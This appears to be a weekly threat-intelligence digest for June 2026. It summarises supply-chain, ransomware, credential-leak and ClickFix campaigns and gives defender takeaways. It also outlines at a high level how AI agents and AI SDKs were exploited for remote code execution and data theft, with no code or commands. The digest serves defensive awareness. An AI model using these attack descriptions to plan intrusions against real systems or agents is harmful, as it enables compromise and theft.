Weekly Threat Intel Report — 2026-W25

TL;DR

Week 25 was bookended by two stories with outsized strategic significance. On one end, Microsoft formally attributed the Mastra AI npm supply chain compromise — over 140 poisoned packages with hidden postinstall payloads — to North Korea's Sapphire Sleet / BlueNoroff (the DPRK financial cluster also tracked as APT38). On the other, an international law enforcement coalition disrupted the SocGholish (TA569) fake-update botnet, which The Record and prior reporting tie to Russia-based Evil Corp (Indrik Spider). Between those bookends: ShinyHunters breached a major UK university, the Klue OAuth incident widened with a new "Icarus" extortion crew taking credit, the FortiBleed leak dumped credentials for nearly 74,000 FortiGate devices, and a new ransomware-as-a-service called Gentlemen stepped into public view with an industrial-grade EDR-killer toolkit.

Notable Activity by Actor

APT38 / Sapphire Sleet / BlueNoroff (DPRK)

Microsoft Threat Intelligence published a deep dive on June 18 describing a supply chain compromise of the Mastra AI framework's npm packages. According to Microsoft, the actor poisoned 140+ packages with postinstall hooks that delivered a hidden JavaScript payload during installation — a textbook supply chain technique (T1195.002) executed at scale against the AI developer ecosystem. BleepingComputer confirmed the DPRK attribution on June 20. The targeting of AI tooling continues a North Korean pattern of pivoting toward whichever ecosystem developers are most actively adopting, with the long-term goal of cryptocurrency theft and credential harvesting.

Indrik Spider (Evil Corp) and TA569 (SocGholish)

The Record reported on June 19 that an international operation targeted SocGholish botnet infrastructure — the fake browser-update loader that has been one of the most prolific initial-access pipelines on the open internet for several years. The reporting links the SocGholish operation to Russia-based Evil Corp. While takedowns of loader networks frequently see infrastructure rebuilt within weeks, the disruption is a meaningful operational setback for downstream affiliates that have relied on SocGholish as a delivery layer.

INC Ransom

DarkReading's June 17 profile described INC Ransom's success as a product of disciplined fundamentals rather than novel tradecraft: exposed edge devices, weak or missing MFA, and a deliberate focus on sectors where downtime creates immediate pressure to pay. The group continues to operate a double-extortion model and has been particularly active in healthcare.

Vanilla Tempest (Vice Society)

DarkReading on June 16 linked the "Lorem Ipsum" / ClickFix delivery campaign — which uses compromised WordPress sites to coerce victims into pasting attacker commands into Run dialogs (T1204.004) — to Vanilla Tempest, the lineage descended from Vice Society. The pivot to ClickFix mirrors a broader 2026 trend: drive-by social engineering that bypasses many email-centric controls entirely.

ShinyHunters

Check Point Research's June 15 bulletin reported that ShinyHunters claimed the breach of the University of Nottingham's student records system, exposing contact details of approximately 454,600 current and former students. The group has remained one of the most consistent data-theft brands operating publicly.

ClearFake

Red Canary's June 2026 Intelligence Insights confirmed ClearFake retained its #1 position in the firm's monthly community telemetry rankings. The persistence of ClearFake reinforces that fake-update social engineering remains one of the most successful initial access patterns in the wild.

Emerging Threats

Gentlemen RaaS and the EDR-killer arms race

ESET Research and BleepingComputer published parallel analyses on June 18 of Gentlemen, a ransomware-as-a-service operation maintaining a dedicated suite of EDR-killer drivers that it actively distributes to affiliates. ESET described the toolkit as the product of months of iterative development. The Record reported the same week that Australian sugar producer Mackay Sugar was working to restore harvesting and milling operations after a cyberattack Gentlemen claimed publicly. Defense evasion via vulnerable-driver abuse (T1562.001) is now a productized commodity rather than a bespoke capability.

Icarus and the Klue / Salesforce chain

BleepingComputer reported on June 18–19 that the Klue Battlecards OAuth breach has been claimed by a new extortion group calling itself Icarus. Klue is the third Salesforce-integrated SaaS application in this campaign cluster to be compromised, and confirmed victims include cybersecurity vendor Huntress. The pattern — steal OAuth tokens from a connected app, then pivot into customer Salesforce tenants — has effectively replaced traditional credential phishing for downstream data theft in this campaign family.

FortiBleed: ~74,000 FortiGate credentials exposed

Recorded Future and BleepingComputer reported on June 19 that a dataset containing valid administrative and VPN credentials for 73,932 FortiGate firewalls was leaked publicly, prompting urgent guidance from both CISA and UK NCSC. DarkReading reported that attackers were already using the data to target organizations in nearly 200 countries. Even where MFA is enforced on user logins, administrative paths and stale local accounts on edge devices are likely to be the primary exposure.

AutoJack and AI-agent attack surface

Microsoft researchers disclosed AutoJack on June 19 — a single-page exploit chain that abuses AutoGen Studio's MCP WebSocket, missing authentication on a localhost service, and unsafe parameter handling to achieve remote code execution on the host running an AI browsing agent. Separately, Unit 42 disclosed a Vertex AI Python SDK bucket-squatting flaw enabling cross-tenant RCE via pickle deserialization, and DarkReading documented a Microsoft Copilot "SearchLeak" one-click data theft chain (since patched). The pattern across all three: AI agents inherit the trust boundary of their host and the data their underlying services can reach, with very little of the input validation discipline mature web applications have built up over two decades.

EvilTokens: phishing without password theft

ESET on June 15 described EvilTokens, a phishing kit that subverts Microsoft's legitimate authentication flow — via device-code abuse — to harvest tokens without ever capturing a password or presenting a fake login page. The technique sidesteps password-strength controls, traditional credential-monitoring tooling, and many MFA implementations.

Splunk Enterprise actively exploited

BleepingComputer reported on June 19 that CISA ordered US federal agencies to patch a critical Splunk Enterprise vulnerability by Sunday, citing active exploitation in the wild. Any organization running Splunk on-prem should treat this as urgent.

Defender Takeaways

1. Treat npm and PyPI as untrusted code paths. The Mastra compromise is the latest reminder that postinstall and equivalent hooks execute untrusted code on developer workstations and CI runners. Consider package allowlisting, lockfile pinning, and disabling lifecycle scripts in CI where feasible.
2. Rotate Fortinet credentials and audit edge device admin paths. If you operate FortiGate devices, assume the FortiBleed dataset is in adversary hands. Rotate, enforce MFA on admin and VPN paths, and check for stale or shared accounts.
3. Inventory your Salesforce-connected applications. The Klue / Icarus pattern is now a recurring playbook. Every connected app is a transitive trust path into your CRM data. Audit OAuth grants, restrict scopes, and monitor for anomalous data extraction by integrated apps.
4. Hunt for vulnerable-driver loads. With Gentlemen turning EDR killers into a productized RaaS feature, blue teams should baseline driver loads and alert on known vulnerable drivers used for EDR tampering.
5. User-execution lures (ClickFix) need a runtime answer. Vanilla Tempest and ClearFake both lean on user-pasted commands. Pure email controls do not catch this — focus on script-host execution telemetry and Run-dialog activity from browser child processes.
6. Patch Splunk Enterprise now. CISA listed the issue as actively exploited with a tight federal deadline; private organizations should mirror that urgency.
7. Govern AI agents as identities. AutoJack and the Copilot SearchLeak chain reinforce that AI agents running on workstations or in cloud tenants need explicit authentication, scoped permissions, and treated as their own identity class.

Sources

• Microsoft Threat Intelligence — From package to postinstall payload: Inside the Mastra npm supply chain compromise by Sapphire Sleet — https://www.microsoft.com/en-us/security/blog/2026/06/17/postinstall-payload-inside-mastra-npm-supply-chain-compromise/
• BleepingComputer — Microsoft links Mastra AI supply chain attack to North Korean hackers — https://www.bleepingcomputer.com/news/security/microsoft-links-mastra-ai-supply-chain-attack-to-north-korean-hackers/
• The Record — Police raid malware network tied to Russia's Evil Corp hacker group — https://therecord.media/socgholish-botnet-disrupted
• DarkReading — INC Ransomware Thrives by Mastering the Basics — https://www.darkreading.com/cyberattacks-data-breaches/inc-ransomware-thrives-by-mastering-the-basics
• DarkReading — 'Lorem Ipsum' Malware Pivots to ClickFix Delivery — https://www.darkreading.com/cyberattacks-data-breaches/lorem-ipsum-malware-clickfix-delivery
• Check Point Research — 15th June Threat Intelligence Report — https://research.checkpoint.com/2026/15th-june-threat-intelligence-report/
• Red Canary — Intelligence Insights: June 2026 — https://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2026/
• ESET Research — Killing me gently: Inside Gentlemen's EDR killer framework — https://www.welivesecurity.com/en/eset-research/killing-me-gently-inside-gentlemens-edr-killer-framework/
• BleepingComputer — Gentlemen ransomware uses multiple EDR killers to disable defenses — https://www.bleepingcomputer.com/news/security/gentlemen-ransomware-uses-multiple-edr-killers-to-disable-defenses/
• The Record — Australian sugar producer works to restore operations as ransomware group claims attack — https://therecord.media/mackay-sugar-cyberattack-claimed-gentlemen
• BleepingComputer — Klue OAuth breach victim list grows as Icarus hackers claim attack — https://www.bleepingcomputer.com/news/security/klue-oauth-breach-victim-list-grows-as-icarus-hackers-claim-attack/
• DarkReading — Salesforce Data Thefts Continue via Klue App Compromise — https://www.darkreading.com/cyberattacks-data-breaches/salesforce-data-thefts-klue-app-compromise
• Recorded Future — FortiBleed Campaign Exposing Credentials for 73,932 FortiGate Systems — https://www.recordedfuture.com/blog/critical-fortibleed-campaign
• UK NCSC — Alert: NCSC issues advice following global targeting of Fortinet firewalls and VPN gateways — https://www.ncsc.gov.uk/news/advice-following-global-targeting-of-fortinet-firewalls-and-vpn-gateways
• BleepingComputer — CISA warns Fortinet users to secure devices after FortiBleed leak — https://www.bleepingcomputer.com/news/security/cisa-warns-fortinet-users-to-secure-devices-after-fortibleed-leak/
• Microsoft Threat Intelligence — AutoJack: How a single page can RCE the host running your AI agent — https://www.microsoft.com/en-us/security/blog/2026/06/18/autojack-single-page-rce-host-running-ai-agent/
• Unit 42 — Pickle in the Middle – Hijacking Vertex AI Model Uploads for Cross-Tenant RCE — https://unit42.paloaltonetworks.com/hijacking-vertex-ai-model/
• ESET — EvilTokens: A phishing attack that doesn't steal your password — https://www.welivesecurity.com/en/cybercrime/eviltokens-phishing-doesnt-steal-password/
• BleepingComputer — CISA: Splunk Enterprise flaw actively exploited, patch by Sunday — https://www.bleepingcomputer.com/news/security/cisa-splunk-enterprise-flaw-actively-exploited-patch-by-sunday/
• BleepingComputer — New Prinz Eugen ransomware prioritizes recent files for encryption — https://www.bleepingcomputer.com/news/security/new-prinz-eugen-ransomware-prioritizes-recent-files-for-encryption/